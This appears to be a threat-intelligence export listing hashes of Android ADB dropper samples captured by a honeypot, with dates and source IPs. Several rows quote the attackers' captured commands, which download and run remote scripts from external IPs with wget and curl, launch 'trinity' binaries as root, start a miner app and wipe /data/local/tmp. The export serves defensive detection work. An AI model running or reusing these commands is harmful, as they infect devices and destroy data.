26. [quickheal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG1FSBpDTqJSHt7dJTkMsd3DABDENRJHcX0_UlKa9ZBC_nm6x0-sclnZRe7IOQAlnTNwvkEe8NZO6O13lcbTsEIYfHHmTht39J5BgpbLWYOcbV2tnPFGbnY6Pc6JM8CMdRbL1-4FzEszA02QJ0XpVcM-NpeUxILFjO4NSNCJvdh3gJXdI02y7tAz-xGE7u2)

STIX indicators

Threat intelligence export

Filter, search, and copy indicators. Download the full STIX 2.1 bundle with GeoIP, ASN, threat scores, and MITRE ATT&CK mappings.

Download STIX

Showing 702 of 702↑↓ navigatec copy

Type	Value	Description	Labels	Valid from
SHA-256	73f4e904706425cca8d5578401819c74a988c2cc81eca1ec2bdb4b758668cc82	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/73f4e904706425cca8d5578401819c74a988c2cc81eca1ec2bdb4b758668cc82.raw; last_seen=2026-05-27T15:59:21.247Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-27
SHA-256	8058b277e0cae15eb1b1f19145c2da546f4329365de824b23527d9a5171b2167	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/8058b277e0cae15eb1b1f19145c2da546f4329365de824b23527d9a5171b2167.raw; last_seen=2026-05-27T14:46:53.458Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-27
SHA-256	697e4904339fc76cc9879b7fdcd1d67d96654b33beb06769d92a78c8fa87f028	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/697e4904339fc76cc9879b7fdcd1d67d96654b33beb06769d92a78c8fa87f028.raw; last_seen=2026-05-25T21:37:58.653Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	ca752a158c7e37696137bfead3e8427b40035f6cbfbef45cf27d9089e2408898	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/ca752a158c7e37696137bfead3e8427b40035f6cbfbef45cf27d9089e2408898.raw; last_seen=2026-05-25T19:22:08.967Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	acf3ee3fd34bb1c8d29664a35ea7cfc9d39bd5b678e980c57872e09ef0df0da1	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/acf3ee3fd34bb1c8d29664a35ea7cfc9d39bd5b678e980c57872e09ef0df0da1.raw; last_seen=2026-05-25T19:35:00.770Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	bb1d83bf2f3b09d9cd630ab0158b11c0dbced6df36d21a99e0ea723eda3bfd8c	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/bb1d83bf2f3b09d9cd630ab0158b11c0dbced6df36d21a99e0ea723eda3bfd8c.raw; last_seen=2026-05-25T19:35:00.412Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	d19fb8a6042e325e08713647f46e5ddf1d56e29a357594f0e313a5493db409ce	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/d19fb8a6042e325e08713647f46e5ddf1d56e29a357594f0e313a5493db409ce.raw; last_seen=2026-05-25T19:35:00.132Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	e82d0ea97861fe4efc9721ae95146aa14b2393a7b66110a4299e20b229d565d1	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/e82d0ea97861fe4efc9721ae95146aa14b2393a7b66110a4299e20b229d565d1.raw; last_seen=2026-05-25T19:34:59.902Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	dd5ac6f4a7b1b6ce4d10dcec2527dbaf499355e5034a0963a9a3eef59c913820	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/dd5ac6f4a7b1b6ce4d10dcec2527dbaf499355e5034a0963a9a3eef59c913820.raw; last_seen=2026-05-25T13:51:02.260Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	beb1218e97ea179b7e727362bcc4306f40cce2457342c8804c7312cb760ade81	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/beb1218e97ea179b7e727362bcc4306f40cce2457342c8804c7312cb760ade81.raw; last_seen=2026-05-24T23:46:52.150Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-25
SHA-256	2fbc5458f663bd1c25e451618cf0c92c55b81d2df6b483aa568e40d224489a59	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/2fbc5458f663bd1c25e451618cf0c92c55b81d2df6b483aa568e40d224489a59.raw; last_seen=2026-05-19T03:07:48.394Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-19
SHA-256	48467a7441bd100a7980a90ac9816577f1ec83a5237f7dda1f655352ce0cfb25	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/48467a7441bd100a7980a90ac9816577f1ec83a5237f7dda1f655352ce0cfb25.raw; last_seen=2026-05-19T03:07:47.085Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-19
SHA-256	a080eff22d8ab7210505937304eb435472bf40ed6e2365ec8a94174620194ad5	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/a080eff22d8ab7210505937304eb435472bf40ed6e2365ec8a94174620194ad5.raw; last_seen=2026-05-19T03:07:47.350Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-19
SHA-256	f12f85a7bb1be64bdb34eeee153b6274767f85b1cb2234dec71ad068d91f3832	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/f12f85a7bb1be64bdb34eeee153b6274767f85b1cb2234dec71ad068d91f3832.raw; last_seen=2026-05-18T13:36:22.128Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-18
SHA-256	26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc.raw; src_ip=88.247.182.131; src_ips=88.247.182.131; cc=TR; last_seen=2026-05-17T20:08:53.621Z; cmds=[OPENX.......F...Xb......shell:cd /data/local/tmp/; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83. \| cd /data/local/tmp/; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh; \| /data/local/tmp/nohup /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-17
SHA-256	890f9f63dfa80674ded1caae9f88f9b6f0eb98c8ba8bebdf028898294c8f252a	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/890f9f63dfa80674ded1caae9f88f9b6f0eb98c8ba8bebdf028898294c8f252a.raw; last_seen=2026-05-16T12:28:09.904Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-16
SHA-256	bd2155188ed000af5d690c7e9b53e7b9f3e4e67c7d1dc30590a8d8572b8112da	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/bd2155188ed000af5d690c7e9b53e7b9f3e4e67c7d1dc30590a8d8572b8112da.raw; last_seen=2026-05-15T23:43:18.161Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-16
SHA-256	6ad3c27482709fcd52f9b9f25b37ce4fbcba59422f3bb4fd2d0f7624b113b7c3	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/6ad3c27482709fcd52f9b9f25b37ce4fbcba59422f3bb4fd2d0f7624b113b7c3.raw; src_ip=117.84.167.27; src_ips=117.84.167.27; cc=CN; last_seen=2026-05-15T20:37:42.888Z; cmds=[cd /data/local/tmp/; busybox wget http://166.88.225.255/hx/android.sh; sh android.sh; curl http://166.88.225.255/hx/andr \| /data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-15
SHA-256	2ee7b048fc54b35083009354497e56d8197cc4c2bc90949d2fdd32dec7bda4ac	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/2ee7b048fc54b35083009354497e56d8197cc4c2bc90949d2fdd32dec7bda4ac.raw; last_seen=2026-05-15T16:41:44.630Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-15
SHA-256	1719c66f6582868719f0e2d4526894996be6bbe0d51b1d523e3bfb19f317808a	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/1719c66f6582868719f0e2d4526894996be6bbe0d51b1d523e3bfb19f317808a.raw; last_seen=2026-05-15T14:37:04.655Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-15
SHA-256	32cf939376dbe70f9a30dc868f88f5c67765a64ce3ee73d14354f99f06fbf0ff	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/32cf939376dbe70f9a30dc868f88f5c67765a64ce3ee73d14354f99f06fbf0ff.raw; last_seen=2026-05-15T12:42:04.970Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-15
SHA-256	2cd23e785cb5acabe267d70bbfa609ede5a5d11a3ff1b8c3d9710aa334cc23ed	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/2cd23e785cb5acabe267d70bbfa609ede5a5d11a3ff1b8c3d9710aa334cc23ed.raw; last_seen=2026-05-14T21:36:58.339Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-14
SHA-256	f6cd82158784ae0396000534816d03766fb909c732a45774dbb8cfa1bef26a05	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/f6cd82158784ae0396000534816d03766fb909c732a45774dbb8cfa1bef26a05.raw; last_seen=2026-05-14T19:33:56.447Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-14
SHA-256	b09fa71c6fca31cd73c906144ea919dfee00c75dd8193911bd3accb61204abb1	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/b09fa71c6fca31cd73c906144ea919dfee00c75dd8193911bd3accb61204abb1.raw; last_seen=2026-05-14T17:37:35.234Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-14
SHA-256	3c9edaec20150b67acb391d516cc9f1dd1d07a968b43a8034ba49508da262db0	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/3c9edaec20150b67acb391d516cc9f1dd1d07a968b43a8034ba49508da262db0.raw; last_seen=2026-05-12T08:36:39.498Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-12
SHA-256	50e9e8821455ec4775b0c22a9dc0e0dba39ac6fb166f6d20b7b09fa2b30a458a	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/50e9e8821455ec4775b0c22a9dc0e0dba39ac6fb166f6d20b7b09fa2b30a458a.raw; last_seen=2026-05-12T08:36:26.366Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-12
SHA-256	aab5691c80cee986173e7c88c3b4aedb3769d8810cc134071d1cb049b152a283	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/aab5691c80cee986173e7c88c3b4aedb3769d8810cc134071d1cb049b152a283.raw; last_seen=2026-05-12T08:36:35.053Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-12
SHA-256	4004b8630bd06be6be05dcfe4a19de67ba67a61da32981ed216470aa8c6a3c2b	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/4004b8630bd06be6be05dcfe4a19de67ba67a61da32981ed216470aa8c6a3c2b.raw; last_seen=2026-05-11T16:11:11.111Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-11
SHA-256	42367d2018e937937ceff927f9600e55342a8a0fd3df1ccb30b3876a76f6a230	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/42367d2018e937937ceff927f9600e55342a8a0fd3df1ccb30b3876a76f6a230.raw; last_seen=2026-05-11T16:11:09.937Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-11
SHA-256	5e98402e6e99f0c46c92c15cd471c8811dbdfd88a0744e448f9d3fc0244a56ae	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/5e98402e6e99f0c46c92c15cd471c8811dbdfd88a0744e448f9d3fc0244a56ae.raw; last_seen=2026-05-11T16:11:10.575Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-11
SHA-256	7719dd43fc49008c43edd1898cc2ec48260d863a8ab43a17632670f8efdf7ba8	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/7719dd43fc49008c43edd1898cc2ec48260d863a8ab43a17632670f8efdf7ba8.raw; last_seen=2026-05-11T16:11:08.778Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-11
SHA-256	d840e0277d804fa0dfead89bf2b35ce77642f8b65985f5bc1516d0aafbd1328a	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/d840e0277d804fa0dfead89bf2b35ce77642f8b65985f5bc1516d0aafbd1328a.raw; last_seen=2026-05-11T16:11:09.509Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-11
SHA-256	dc051f1ad62e2e396a4f3107f5f07f5e98189cd80e1c8994e23503a0e69d3da2	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/dc051f1ad62e2e396a4f3107f5f07f5e98189cd80e1c8994e23503a0e69d3da2.raw; last_seen=2026-05-10T19:42:35.461Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	c883cc254a3fd9a939487efd46dfc898491d607f0af9e43834201cc86797f87c	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/c883cc254a3fd9a939487efd46dfc898491d607f0af9e43834201cc86797f87c.raw; last_seen=2026-05-10T19:06:34.659Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	4a816c942d1e9033f5e3f6aef62c501dfa1d6c53eaeb4d8ca3d6da66ba25e1c6	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/4a816c942d1e9033f5e3f6aef62c501dfa1d6c53eaeb4d8ca3d6da66ba25e1c6.raw; last_seen=2026-05-10T19:06:29.316Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	ab7ecbb6a930c75f9497b6bf15c86cb528b382bc28b0cbaf9bfced2b6d56649d	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/ab7ecbb6a930c75f9497b6bf15c86cb528b382bc28b0cbaf9bfced2b6d56649d.raw; last_seen=2026-05-10T19:06:30.930Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	385ea3e8820978f2ff0a2cf3abff6a0f54b43fe496cf88131dd5b331cb6ee6fc	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/385ea3e8820978f2ff0a2cf3abff6a0f54b43fe496cf88131dd5b331cb6ee6fc.raw; last_seen=2026-05-10T17:45:41.814Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	0dcf714e673750914e631f21abeb2dc58f034757b1896070fdbe027e4a58e416	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/0dcf714e673750914e631f21abeb2dc58f034757b1896070fdbe027e4a58e416.raw; src_ip=194.127.167.122; src_ips=194.127.167.122; cc=EE; last_seen=2026-05-10T16:03:18.884Z; cmds=[cd /data/local/tmp/; busybox wget http://176.65.139.11/cat.sh; sh cat.sh; curl http://176.65.139.11/cat.sh -o cat.sh; sh \| cd /data/local/tmp/; busybox wget http://176.65.139.11/cat.sh; sh cat.sh; curl http://176.65.139.11/cat.sh -o cat.sh; sh \| rm -f '/data/local/tmp/.sutekh.apk' 2>/dev/null]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	3b5fed474c7ca7daf87d755878652eff49f3758e2787552346f48789ad6a6681	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/3b5fed474c7ca7daf87d755878652eff49f3758e2787552346f48789ad6a6681.raw; last_seen=2026-05-10T14:37:34.538Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	7515bf959b73b956ceb967351c7e299cbb3668a53d35f9c770eb72e00d93ced6	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/7515bf959b73b956ceb967351c7e299cbb3668a53d35f9c770eb72e00d93ced6.raw; last_seen=2026-05-10T12:54:56.809Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	1ae7e583f0438f67eab7b20800568a67e9c0ab1f9cad5ac67b95169bf822a678	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/1ae7e583f0438f67eab7b20800568a67e9c0ab1f9cad5ac67b95169bf822a678.raw; last_seen=2026-05-10T09:57:15.706Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	3ffe848a8b85f1cbcf294686d5147c2a2bb67b48735d494b34c7cbafa49d4483	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/3ffe848a8b85f1cbcf294686d5147c2a2bb67b48735d494b34c7cbafa49d4483.raw; last_seen=2026-05-10T09:57:22.226Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	672751ab69dfc7b07e83d2defac8df06b0d31e5fc995b514a77bbbdf9bdcbce7	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/672751ab69dfc7b07e83d2defac8df06b0d31e5fc995b514a77bbbdf9bdcbce7.raw; last_seen=2026-05-10T09:57:19.214Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	b37aa7b03d30c481094256eb2361597356d94f346219d8859455eeaa59e6124a	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/b37aa7b03d30c481094256eb2361597356d94f346219d8859455eeaa59e6124a.raw; last_seen=2026-05-10T09:57:27.987Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	fb6949d2a61e5cbd77922204d7341c3191f610d3fa7961312cedddf284d061e9	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/fb6949d2a61e5cbd77922204d7341c3191f610d3fa7961312cedddf284d061e9.raw; last_seen=2026-05-10T09:57:17.423Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-10
SHA-256	6257c5693b0768470c5a1a0ea7c8efa9feb6dcda395ea8c768fef11b458ee7ea	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/6257c5693b0768470c5a1a0ea7c8efa9feb6dcda395ea8c768fef11b458ee7ea.raw; last_seen=2026-05-09T13:03:01.195Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-09
SHA-256	5ebfe56dbcf1ef0f649a021348cba32d0d27a799f80f80eed744e46eb5d522b6	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/5ebfe56dbcf1ef0f649a021348cba32d0d27a799f80f80eed744e46eb5d522b6.raw; last_seen=2026-05-08T12:22:19.529Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-08
SHA-256	78c694c28174b0ddfc36745d3b6b07ef951006f183fdcccb157025c27e024f04	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/78c694c28174b0ddfc36745d3b6b07ef951006f183fdcccb157025c27e024f04.raw; last_seen=2026-05-08T01:39:03.530Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-08
SHA-256	5e30e4677b2b91eb0b57a646a14bd4fcbe8538967d44598347c7b157ee4f9115	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/5e30e4677b2b91eb0b57a646a14bd4fcbe8538967d44598347c7b157ee4f9115.raw; last_seen=2026-05-07T02:58:40.047Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-07
SHA-256	7e45e9769cb7f1db7b20cd3a06d61a2977e8f31e9774e0a4a70e048384041f58	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/7e45e9769cb7f1db7b20cd3a06d61a2977e8f31e9774e0a4a70e048384041f58.raw; last_seen=2026-05-07T02:58:38.841Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-07
SHA-256	f23ad05baffc1e5f13a87c8f800001c0b4b72a1c239aa2f77c3fe8c545402ea4	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/f23ad05baffc1e5f13a87c8f800001c0b4b72a1c239aa2f77c3fe8c545402ea4.raw; last_seen=2026-05-07T02:58:37.638Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-07
SHA-256	7ce8763895b52c9345961d321a95c1b2dfec59c24dd30873c9ebe191af1fd15a	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/7ce8763895b52c9345961d321a95c1b2dfec59c24dd30873c9ebe191af1fd15a.raw; last_seen=2026-05-06T15:06:03.550Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-06
SHA-256	9ff4635a1cd9e401cfce19eeed54b6cde408bcccb70be490186c4808a3ec3b13	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/9ff4635a1cd9e401cfce19eeed54b6cde408bcccb70be490186c4808a3ec3b13.raw; last_seen=2026-05-06T15:05:59.271Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-06
SHA-256	eefb634eb31119028eca996f87b0e4b3b00a2b2edfd6e205a2a275112341ddc4	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/eefb634eb31119028eca996f87b0e4b3b00a2b2edfd6e205a2a275112341ddc4.raw; last_seen=2026-05-06T15:05:56.160Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-06
SHA-256	71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5.raw; src_ip=119.247.97.228; src_ips=119.247.97.228; cc=HK; last_seen=2026-05-06T15:08:34.430Z; cmds=[rm -rf /data/local/tmp/* \| ps \| grep trinity \| am start -n com.ufo.miner/com.example.test.MainActivity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-06
SHA-256	518a3e3dcd73646208adfc140f17c0acc9d37c98b9f5f8b40db5b2b2a02f6286	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/518a3e3dcd73646208adfc140f17c0acc9d37c98b9f5f8b40db5b2b2a02f6286.raw; last_seen=2026-05-05T18:57:56.596Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-05
SHA-256	ee35e97129adbf882d22489c5e1feff97ba3fa2f03d2fa397e08f648c1f6320b	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/ee35e97129adbf882d22489c5e1feff97ba3fa2f03d2fa397e08f648c1f6320b.raw; last_seen=2026-05-04T20:22:19.543Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-04
SHA-256	63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857.raw; src_ip=121.190.85.48; src_ips=121.190.85.48; cc=KR; last_seen=2026-05-03T19:27:20.929Z; cmds=[/data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity \| chmod 0755 /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-03
SHA-256	0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw; src_ip=218.205.95.160; src_ips=218.205.95.160; cc=CN; last_seen=2026-05-03T14:19:05.704Z; cmds=[cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null\|\|busybox wget -q \| /data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-03
SHA-256	76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64.raw; src_ip=218.205.95.160; src_ips=218.205.95.160; cc=CN; last_seen=2026-05-03T14:19:43.159Z; cmds=[cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null\|\|busybox wget -q \| /data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-03
SHA-256	a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437.raw; src_ip=218.205.95.160; src_ips=218.205.95.160; cc=CN; last_seen=2026-05-03T14:20:25.039Z; cmds=[cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null\|\|busybox wget -q \| /data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-03
SHA-256	43729ea54ede1af2fec26d9ed0d61eca149c0f4f2c094b444f20595717e30c0c	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/43729ea54ede1af2fec26d9ed0d61eca149c0f4f2c094b444f20595717e30c0c.raw; last_seen=2026-05-02T21:57:01.477Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-02
SHA-256	985fc75cea86d2a6b7e38021be3df87b9e862cc89d4210183a48a4879676470d	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/985fc75cea86d2a6b7e38021be3df87b9e862cc89d4210183a48a4879676470d.raw; last_seen=2026-05-02T21:57:01.216Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-02
SHA-256	608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971.raw; src_ip=1.31.31.7; src_ips=1.31.31.7; cc=CN; last_seen=2026-05-02T06:38:55.610Z; cmds=[/data/local/tmp/nohup /data/local/tmp/log \| /data/local/tmp/nohup su -c /data/local/tmp/log \| chmod 0755 /data/local/tmp/log]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-02
SHA-256	7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865.raw; src_ip=1.31.31.7; src_ips=1.31.31.7; cc=CN; last_seen=2026-05-02T06:38:19.142Z; cmds=[/data/local/tmp/nohup /data/local/tmp/log \| /data/local/tmp/nohup su -c /data/local/tmp/log \| chmod 0755 /data/local/tmp/log]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-02
SHA-256	d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5.raw; src_ip=1.31.31.7; src_ips=1.31.31.7; cc=CN; last_seen=2026-05-02T06:39:34.387Z; cmds=[/data/local/tmp/nohup /data/local/tmp/log \| /data/local/tmp/nohup su -c /data/local/tmp/log \| chmod 0755 /data/local/tmp/log]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-02
SHA-256	d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0.raw; src_ip=1.31.31.7; src_ips=1.31.31.7; cc=CN; last_seen=2026-05-02T06:39:45.894Z; cmds=[/data/local/tmp/nohup /data/local/tmp/log \| /data/local/tmp/nohup su -c /data/local/tmp/log \| chmod 0755 /data/local/tmp/log]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-02
SHA-256	008061f90f26a3462294a1d5b02424fab50a32fc0aadc0a7b05dfc70cce4e023	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/008061f90f26a3462294a1d5b02424fab50a32fc0aadc0a7b05dfc70cce4e023.raw; last_seen=2026-05-01T14:46:41.048Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-01
SHA-256	e27b0606d96ca3e92cff83125137dba4c94d902b67086970ff49ce3ff241ed76	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/e27b0606d96ca3e92cff83125137dba4c94d902b67086970ff49ce3ff241ed76.raw; last_seen=2026-05-01T13:54:00.451Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-01
SHA-256	16aca11323d8bb11a76352e9385a808925492c0e06d4fa9b240f4a130e1e85c3	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/16aca11323d8bb11a76352e9385a808925492c0e06d4fa9b240f4a130e1e85c3.raw; last_seen=2026-05-01T00:17:04.912Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-01
SHA-256	8ce0d00d3e6f03a3d44a605a331ada378787c2518e41945695494d0c84aa19ec	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/8ce0d00d3e6f03a3d44a605a331ada378787c2518e41945695494d0c84aa19ec.raw; last_seen=2026-05-01T00:17:03.559Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-01
